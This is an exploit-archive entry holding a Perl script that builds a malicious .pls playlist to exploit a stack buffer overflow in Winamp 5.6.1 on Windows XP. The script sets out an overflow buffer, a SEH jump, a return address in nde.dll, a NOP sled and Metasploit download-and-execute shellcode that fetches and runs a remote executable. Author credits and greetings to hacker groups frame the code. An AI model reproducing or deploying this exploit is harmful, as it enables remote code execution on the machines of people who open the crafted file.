Winamp 5.6.1 (.pls) Remote Command Execution

🗓️ 15 Apr 2011 00:00:00Reported by KedAns-DzType
zdt🔗 0day.today👁 27 Views
Winamp 5.6.1 (.pls) Remote Command Execution on Window
#!/usr/bin/perl
###
# Title : Winamp 5.6.1 (.pls) Remote Command  Execution
# Author : KedAns-Dz
# E-mail : [email protected] || [email protected]
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : windows
# Impact : Remote Command  Execution / Download and Exec / Crashs...
# Tested on : Windows XP sp3 FR
###
# Note : BAC 2011 Enchallah ( Ked & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
##
# [Â»] ~ special thanks to : jos_ali_joe (exploit-id.com) , and All exploit-id Team
###
# =============
my $junk = "http://";
my $buffer = "\x41" x 1321;
my $seh = "\xeb\x06\x90\x90" ; # short jump
my $eip = "\xad\x86\x0e\x07"; # CALL ESP nde.dll
my $nop = "\x90" x 32;
# =============
# windows/download_exec (http://www.metasploit.com)
# Encoder: x86/alpha_mixed
# URL= http://127.0.0.1:8888/ked/k.exe
my $shellcode =
"\x56\x54\x58\x36\x33\x30\x56\x58\x48\x34\x39\x48\x48\x48" .
"\x50\x68\x59\x41\x41\x51\x68\x5a\x59\x59\x59\x59\x41\x41" .
"\x51\x51\x44\x44\x44\x64\x33\x36\x46\x46\x46\x46\x54\x58" .
"\x56\x6a\x30\x50\x50\x54\x55\x50\x50\x61\x33\x30\x31\x30" .
"\x38\x39\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41" .
"\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42" .
"\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4a\x4b\x46" .
"\x70\x42\x7a\x42\x6a\x45\x63\x48\x49\x50\x66\x4e\x59\x45" .
"\x6c\x47\x71\x4d\x50\x45\x64\x45\x5a\x4c\x59\x4b\x52\x49" .
"\x6a\x48\x6b\x47\x75\x4d\x38\x4a\x4b\x4b\x4f\x4b\x4f\x49" .
"\x6f\x44\x30\x50\x4c\x4f\x69\x4a\x39\x4f\x69\x4b\x73\x49" .
"\x6d\x45\x68\x4d\x79\x4e\x79\x4f\x69\x4d\x49\x42\x32\x4b" .
"\x69\x4e\x75\x45\x42\x48\x69\x4f\x75\x46\x54\x47\x62\x4a" .
"\x79\x4c\x51\x44\x52\x51\x51\x44\x52\x4b\x5a\x49\x35\x45" .
"\x42\x4a\x4d\x4d\x57\x4b\x51\x4f\x6a\x42\x4a\x42\x32\x4b" .
"\x57\x4e\x59\x4d\x4a\x51\x72\x42\x32\x48\x57\x4c\x4d\x4d" .
"\x7a\x50\x74\x48\x4f\x48\x4e\x4a\x68\x42\x32\x4f\x56\x4e" .
"\x7a\x50\x62\x45\x42\x42\x4b\x4b\x43\x4e\x77\x49\x50\x43" .
"\x5a\x45\x6f\x48\x6d\x4e\x71\x4f\x30\x4a\x66\x44\x5a\x51" .
"\x4e\x4f\x6d\x49\x4c\x51\x6b\x44\x30\x4b\x70\x4a\x66\x4f" .
"\x37\x42\x32\x42\x74\x45\x42\x49\x4f\x4f\x4d\x4e\x7a\x50" .
"\x5a\x47\x38\x42\x58\x4c\x5a\x42\x78\x4f\x5a\x50\x50\x4b" .
"\x4f\x46\x72\x4e\x71\x47\x62\x49\x4f\x4e\x65\x4d\x4a\x42" .
"\x7a\x50\x58\x42\x58\x4f\x6b\x4d\x4a\x46\x38\x47\x62\x4a" .
"\x39\x4c\x5a\x42\x7a\x45\x42\x45\x33\x46\x72\x42\x4e\x46" .
"\x7a\x43\x6f\x4a\x37\x47\x62\x42\x69\x4b\x43\x4f\x6d\x4f" .
"\x30\x51\x61\x4f\x39\x4c\x59\x4c\x59\x4a\x39\x44\x5a\x51" .
"\x4f\x4c\x54\x48\x4b\x4a\x6f\x50\x66\x48\x4e\x51\x75\x48" .
"\x43\x46\x72\x43\x71\x48\x73\x4a\x38\x4f\x30\x50\x71\x4f" .
"\x54\x4e\x79\x4c\x59\x4a\x39\x45\x4a\x43\x6f\x4d\x5a\x4a" .
"\x6f\x4b\x6f\x42\x39\x4f\x57\x45\x49\x48\x6c\x45\x33\x46" .
"\x79\x4e\x4f\x45\x49\x48\x47\x47\x6a\x42\x55\x48\x39\x44" .
"\x52\x42\x65\x48\x73\x4c\x79\x48\x4a\x51\x76\x4a\x6e\x43" .
"\x45\x51\x4e\x4d\x4d\x4d\x4a\x49\x55\x49\x68\x4d\x67\x49" .
"\x6c\x43\x6e\x4b\x6d\x4f\x6a\x4f\x6d\x4b\x51\x49\x6c\x4d" .
"\x49\x4f\x69\x4c\x6a\x46\x39\x4f\x39\x48\x49\x4a\x6a\x4a" .
"\x6f\x4f\x39\x45\x36\x4a\x6e\x43\x55\x42\x32\x51\x55\x49" .
"\x59\x4b\x7a\x51\x76\x48\x4e\x51\x79\x4a\x69\x50\x66\x4a" .
"\x6e\x42\x4d\x4d\x7a\x51\x49\x50\x35\x47\x6c\x50\x59\x4a" .
"\x4c\x45\x30\x4a\x68\x48\x4b\x4a\x6f\x4b\x7a\x43\x56\x42" .
"\x6b\x48\x43\x4b\x70\x46\x52\x43\x4b\x43\x47\x4e\x4a\x51" .
"\x49\x50\x5a\x42\x51\x4d\x6f\x45\x36\x50\x66\x51\x76\x49" .
"\x4e\x4b\x4c\x4a\x4d\x48\x49\x4a\x4b\x4a\x56\x4a\x5a\x48" .
"\x58\x4b\x4d\x4b\x4d\x48\x6b\x4b\x4c\x48\x6a\x4a\x4a\x4c" .
"\x59\x49\x4e\x49\x6c\x4a\x4d\x49\x5a\x4b\x50\x49\x7a\x48" .
"\x6d\x49\x6c\x49\x64\x4b\x6d\x4c\x30\x48\x6b\x49\x6c\x4a" .
"\x5a\x48\x6d\x4a\x56\x4a\x4b\x49\x70\x4a\x78\x4a\x39\x4a" .
"\x6e\x4a\x50\x4b\x47\x4b\x6c\x49\x71\x49\x6c\x4a\x5a\x4f" .
"\x69\x4b\x6c\x48\x61\x4a\x50\x4a\x4d\x48\x4d\x4c\x31\x48" .
"\x6b\x4b\x4c\x48\x78\x4b\x4d\x4d\x49\x49\x45\x4b\x46\x48" .
"\x78\x49\x6d\x4b\x65\x48\x70\x4b\x4b\x4a\x4b\x4a\x58\x4a" .
"\x4b\x4d\x30\x4b\x68\x4c\x59\x48\x6c\x48\x6b\x48\x75\x4b" .
"\x44\x4a\x56\x48\x77\x4f\x69\x4a\x6c\x4a\x6b\x49\x45\x49" .
"\x4d\x4c\x36\x4a\x4e\x48\x77\x48\x75\x4a\x56\x4b\x48\x49" .
"\x6d\x48\x4d\x49\x66\x4b\x6f\x4c\x30\x48\x75\x49\x6c\x4e" .
"\x38\x4a\x39\x42\x48\x51\x64\x51\x64\x42\x50\x47\x4a\x44" .
"\x6f\x44\x6f\x50\x31\x44\x72\x50\x37\x44\x6e\x50\x30\x46" .
"\x4e\x50\x30\x44\x6e\x46\x51\x44\x7a\x44\x78\x50\x38\x46" .
"\x58\x46\x58\x44\x6f\x50\x6b\x45\x35\x51\x74\x46\x4f\x42" .
"\x4b\x44\x6e\x43\x55\x51\x68\x50\x65\x4b\x30\x41\x41";
# =============
my $header="[playlist]\n".
"NumberOfEntries=1\n".
"File1=";
my $finalnop = "\x90" x 543;
# =============
open(myfile,'>> KedAns.pls');
print myfile $header.$junk.$buffer.$seh.$eip.$nop.$shellcode.$finalnop;
close (myfile);
#================[ Exploited By KedAns-Dz * HST-Dz * ]=========================================== 
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz
# Masimovic * TOnyXED * jos_ali_joe (exploit-id.com) * r0073rt (Inj3ct0r.com) * TreX (hotturks.org)
# Nayla Festa * all (sec4ever.com) Members * KelvinX (kelvinx.net) * PLATEN (Pentesters.ir)
# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
# Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX
# Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
# www.1337day.com * exploit-id.com * www.packetstormsecurity.org * bugsearch.net
# www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ...
#================================================================================================



#  0day.today [2018-02-06]  #
15 Apr 2011 00:00Current
6.8Medium risk
Vulners AI Score6.8